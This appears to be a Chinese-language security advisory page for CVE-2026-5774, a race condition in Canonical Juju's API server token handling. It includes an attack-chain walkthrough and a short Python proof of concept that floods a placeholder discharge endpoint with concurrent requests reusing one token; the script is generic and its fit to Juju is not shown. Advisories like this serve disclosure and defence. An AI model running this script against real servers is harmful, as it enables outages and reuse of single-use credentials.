CVE-2026-5774 CVSS 6.4 中危

CVE-2026-5774: Canonical Juju 同步漏洞导致DoS与Token重用

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5774

漏洞类型

竞态条件

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Canonical Juju

漏洞概述

Canonical Juju API服务器的userTokens映射存在严重的同步不当漏洞。由于缺乏正确的并发控制机制，经过身份认证的攻击者可能利用此竞态条件漏洞导致服务器拒绝服务，或者非预期地重用本应仅限一次使用的discharge token。该漏洞影响了多个Juju版本，攻击需要低权限及网络访问，但利用难度较高。

技术细节

该漏洞的根本原因在于Canonical Juju API服务器在处理用户认证状态时，对`userTokens`映射的并发访问控制不当。在多线程或异步处理的API服务架构中，当多个请求同时修改或读取`userTokens`这一共享数据结构时，由于缺乏必要的锁机制或原子操作保障，产生了竞态条件。攻击者通过精心构造的并发请求序列，可以破坏映射的完整性，导致服务器进程崩溃或资源耗尽，从而实现拒绝服务攻击。更为严重的是，该缺陷影响了macaroon认证机制中的一次性discharge token验证逻辑。同步缺失可能导致系统未能及时将已使用的token标记为失效，使得攻击者能够重用这些token。这不仅违反了安全设计的一次性使用原则，还可能导致授权绕过风险。鉴于CVSS向量中的AC:H（攻击复杂度高），成功利用该漏洞需要精确控制时序。

攻击链分析

STEP 1

步骤1：侦察与身份验证

攻击者获取目标Juju API服务器的访问权限，并注册或入侵一个低权限用户账号，获取有效的认证凭证。

STEP 2

步骤2：构造并发请求

攻击者编写脚本，利用多线程或异步IO技术，同时向API服务器发送大量包含相同discharge token或针对userTokens映射的请求。

STEP 3

步骤3：触发竞态条件

由于服务器端缺乏同步机制，高并发的读写操作导致userTokens映射发生数据竞争，破坏内部状态一致性。

STEP 4

步骤4：达成攻击目标

成功利用漏洞导致API服务器崩溃或停止响应（DoS），或者在服务器未能正确校验的情况下成功重用了本应过期的单次token。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import threading

# Target URL (Replace with actual Juju API endpoint)
TARGET_URL = "https://<juju-api-endpoint>/discharge"
# Valid authentication token obtained by low-privilege user
AUTH_TOKEN = "<valid-single-use-token>"

def send_request():
    headers = {
        "Authorization": f"Bearer {AUTH_TOKEN}",
        "Content-Type": "application/json"
    }
    try:
        # Attempt to reuse the token concurrently
        response = requests.post(TARGET_URL, headers=headers, timeout=5)
        print(f"Status: {response.status_code}, Response: {response.text}")
    except Exception as e:
        print(f"Error: {e}")

# Create multiple threads to simulate race condition on the userTokens map
threads = []
for i in range(50):
    t = threading.Thread(target=send_request)
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("PoC execution completed. Check server status for DoS or token reuse success.")

影响范围

Canonical Juju 4.0.5

Canonical Juju 3.6.20

Canonical Juju 2.9.56

防御指南

临时缓解措施

建议立即应用官方发布的安全补丁以修复同步问题。如果无法立即升级，应严格限制对Juju API服务器的网络访问，仅允许可信IP地址连接，并配置WAF规则检测异常的并发请求模式，以降低被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表